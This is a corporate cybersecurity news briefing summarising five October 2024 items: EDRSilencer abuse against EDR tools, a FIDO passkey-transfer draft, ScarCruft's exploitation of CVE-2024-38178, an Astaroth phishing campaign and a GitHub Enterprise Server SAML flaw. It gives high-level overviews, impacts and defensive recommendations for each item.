WME Security Briefing 24 October 2024

WME Cybersecurity Briefings No. 031

Hackers Exploit EDRSilencer to Evade Security Detection

Overview

Threat actors have been observed abusing the EDRSilencer tool as part of their bypass techniques against endpoint detection and response (EDR) solutions to carry out attacks against targeted organizations successfully. EDRSilencer is an open-source utility created to disable selective EDR processes; by exploiting it, attackers can stealthily operate and avoid being detected for their malevolent actions. It draws inspiration from the NightHawk FireBlock tool and leverages the Windows Filtering Platform to perform malicious activities. Basically, It blocks outbound communications from EDR software.

Impact

With EDRSilencer exploited, attackers can bypass the cyber defense mechanisms provided by top cybersecurity vendors offering EDR products. The manoeuvre allows them to deactivate processes from popular EDR solutions like Microsoft, Trellix, SentinelOne, and Palo Alto networks.

With this tool in place, attackers can automatically recognize the outbound network traffic from EDR processes using additional code and then block telemetry data upload to security consoles.

This results in malware and other threats going unnoticed, which can give an attempted attack a greater chance of success without any security intervention. The tool also leverages WFP to create persistent filters that stop the EDR solutions from sending out alerts, further obscuring malicious activity.

Exploiting tools like EDRSilencer is part of a growing trend among ransomware groups. These groups are increasingly using advanced EDR-killing tools like AuKill, EDRKillShifter, GhostDriver, etc. to maintain persistence in compromised systems.

Recommendation

To defend against threats using EDRSilencer and related tools, organizations should:

  • Keep EDR solutions up to date and apply security patches regularly to prevent the use of known vulnerabilities.
  • Be vigilant of suspicious activity – keep an eye out for unexpected or strange network traffic.
  • Adopt layered security strategies that offer more capability beyond EDR software, like network-based intrusion detection systems (IDS) and anomaly detection solutions.
  • Adopt a dedicated endpoint security solution that is able to detect and remove unauthorized modifications of system-level modules (in our case, WFP).
  • Our security teams should refine and iterate as threats change to keep pace with evolving tactics.

FIDO Alliance Proposes New Standard to Streamline Passkey Transfers Across Platforms

Overview

The FIDO Alliance is developing a protocol designed to facilitate the transfer of passkeys and credentials from one platform to another, simplifying multi-platform interaction among providers.

The FIDO Alliance published a draft specification for a secure credential exchange protocol. The draft follows the collaboration of Credential Provider Special Interest Group (SIG) members, including Apple, Google and Microsoft. This move addresses the growing demand for seamless credential management as over 12 billion online accounts are now being accessed via passwordless sign-in solutions.

Impact

The current challenge with passkeys is their limited portability. While resistant to phishing, passkeys are typically tied to a specific operating system or password manager. This makes it difficult to transfer credentials between platforms when users switch devices, so users have to recreate passkeys on new devices.

The proposed specification proposes Credential Exchange Protocol (CXP) and Credential Exchange Format (CXF).

These standards will provide a unified method for transferring credentials like passkeys between providers without compromising security. They ensure credential transfers are encrypted and are safe by default. With companies like Amazon already supporting passkeys for over 175 million accounts, this initiative seeks to accelerate passkey adoption by removing existing barriers to credential management across platforms.

Recommendation

Leaders and practitioners are encouraged to monitor the Credential Exchange Protocol and Credential Exchange Format as these standards mature towards formal completion. Standardizing those protocols when they become available might simplify credential management across different platforms and devices, combining security with a better user experience.

Additionally, users can continue to rely on passkeys as a security factor, protecting against phishing and password reuse for the time being. Also, expect additional details as the FIDO Alliance finalizes its move. Finally, remember to update your credential management systems with protocol changes for secure, seamless credential transfers.

ScarCruft Exploits Windows Zero-Day to Deliver RokRAT Malware

Overview

Security researchers discovered a zero-day exploitation utilized by ScarCruft ( also known as APT37, TA-RedAnt, and InkySquid). This group is part of the North Korean government and has a track record of malicious activities.

The group propagated the RokRAT family of malware followers using a now-patched Windows flaw, CVE-2024-38178. The Scripting Engine vulnerability could be exploited to execute remote code using the Edge browser in Internet Explorer Mode.

Researchers in the AhnLab Security Intelligence Center (ASEC) and the National Cyber Security Center of the Republic of Korea (NCSC) detected this vulnerability. The operation being carried out against them is named “ Operation Code on Toast.”

Impact

The CVE-2024-38178 vulnerability, with a CVSS score of 7.5, posed a serious risk. It enabled remote actors to compromise devices if users clicked on malicious URLs. The flaw caused memory corruption in the Scripting Engine used by Internet Explorer modules. Ultimately, it allowed attackers to exploit toast notifications (a common feature in free software distribution in South Korea).

If exploited, this vulnerability may lead to the deployment of RokRAT malware on affected machines. The malware grants attackers remote access and control. They can then gather sensitive data and execute further commands. Notably, RokRAT used cloud services like Dropbox and Yandex Cloud for its command-and-control (C2) – which means even more difficult detection chances within regular traffic patterns.

Recommendation

Users and organizations should follow the same recommendation and apply Microsoft patches, especially those released in the last quarter of 2024, to resolve CVE-2024-38178.

To mitigate risks:

  • Update to the latest versions of Windows operating systems and all applications.
  • Try not to click on the dodgy links. NEVER from unknown sources.
  • Regularly watch for odd behavior coming from your network, especially communications.

Astaroth Banking Malware Resurfaces in Brazil via Spear-Phishing Campaign

Overview

A recently caught spear-phishing campaign in Brazil has dusted off the Brazilian banking-targeted malware Astaroth. This malware, also called Guildma, uses obfuscated JavaScript to bypass traditional security defenses. The phishing emails pose as official tax documents, capitalizing on the immediacy of personal income taxes in order to dupe users into downloading malicious files.

Impact

Astaroth attacks, likely to evolve even further in the future, pose a severe long-term danger resulting from eroded consumer confidence and escalated remediation expenses. This malware can steal sensitive financial data and cause widespread destruction. In this campaign, attackers use ZIP attachments that contain malicious Windows shortcut (LNK) files.

These shortcuts abuse the legitimate mshta.exe utility to run hidden JavaScript commands. This way, they connect with the attacker’s command-and-control (C2) server. The outcome is a major violation of security that compromises the target systems and disrupts business functions, having the potential for regulatory fines.

Recommendation

To protect against Astaroth malware:

  • Establish a strong password policy to check unauthorised access.
  • Add a layer of security: multi-factor authentication (MFA)
  • Update security solutions and software to mitigate against known vulnerabilities.
  • Principle of least privilege (PoLP): Restrict access to essential systems and needless attack surface.

Phishing tactics can steal personally identifiable information (PII). Organizations need to be on the lookout, especially at this time when tax-related documents are circulating and might contain unusual anomalies. In addition, proper email security filtering and monitoring systems can help discover and prevent such nefarious campaigns.

Critical GitHub Enterprise Server Flaw Allows Unauthorized Access to Instances

Overview

GitHub releases essential security updates for GitHub Enterprise Server (GHES). The company has issued significant security patches, including ones that addressed a highly critical vulnerability that could be exploited to gain unauthorized access to GHES instances.

CVE-2024-9487 has a CVSS score of 9.5, one of the highest ones. The flaw impacts GitHub’s handling of SAML single sign-on (SSO) authentication, and it is crucial when using the optional encrypted assertions feature. Attackers can exploit it using an SSO password to get in through a separate gateway because cryptographic signatures are not verified properly.

Impact

If exploited, CVE-2024-9487 could allow attackers to:

●    Bypass authentication protocols.

●    Provision users without authorization.

●    Gain unauthorized access to sensitive data on GitHub.

GitHub has categorized the flaw as a regression introduced during the remediation of a previous vulnerability, CVE-2024-4985.

In addition, GitHub addressed two other vulnerabilities:

CVE-2024-9539, an information disclosure vulnerability and a sensitive data exposure flaw in the management console’s HTML forms (no CVE assigned).

Lastly, all these vulnerabilities have been addressed in GHES versions 3.14.2, 3.13.5, 3.12.10, 3.11.16.

Recommendation

To protect against these vulnerabilities, it is highly recommended that any self-hosted GitHub Enterprise Server versions upgrade immediately to the newest GHES versions: 3.14.2 and 3.13.5. That said, check the SAML Single Sign-On settings to ensure proper encryption configurations.

Share:

Facebook
Twitter
LinkedIn
Picture of Matt Tinney

Matt Tinney

Professional IT executive & business leader having decades of experience with Microsoft technologies delivering modern-day cloud & security solutions.

Contact Us

=
On Key

More Posts

Be assured of everything

Get WME Services

Stay ahead of the competition with our Professional IT offerings.

=